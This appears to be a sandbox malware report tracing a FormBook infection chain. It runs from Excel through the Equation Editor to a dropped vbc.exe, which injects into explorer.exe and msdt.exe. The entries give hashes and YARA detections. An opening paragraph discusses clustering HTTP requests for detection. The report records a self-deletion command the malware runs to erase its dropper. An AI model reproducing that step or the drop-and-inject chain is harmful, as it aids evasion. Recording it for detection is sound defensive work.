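Keying the cluster on everything except the Host is the point: the path, parameter names and trailing token stay constant across all four sessions while the Host, the destination IP and even the HTTP status (404, 403, 301) vary, which is why per-host reputation alone misses this and why the 5-second spacing of the DNS queries is the better second signal.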



Target ID: 0
Start time: 22:36:16
Start date: 28/01/2022
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13f860000
File size: 28253536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 22:36:38
Start date: 28/01/2022
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 4
Start time: 22:36:40
Start date: 28/01/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\vbc.exe"
Imagebase: 0x400000
File size: 254186 bytes
MD5 hash: C2CA2BA9C38EB02217588662717BA6C3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 35%, ReversingLabs
Reputation: low

Target ID: 5
Start time: 22:36:42
Start date: 28/01/2022
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\Public\vbc.exe"
Imagebase: 0x400000
File size: 254186 bytes
MD5 hash: C2CA2BA9C38EB02217588662717BA6C3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:6
                                                      Start time:22:36:46
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xffa10000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:22:37:01
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                      Imagebase:0xa40000
                                                      File size:983040 bytes
                                                      MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Target ID:8
                                                      Start time:22:37:05
                                                      Start date:28/01/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\Public\vbc.exe"
                                                      Imagebase:0x4a780000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      No disassembly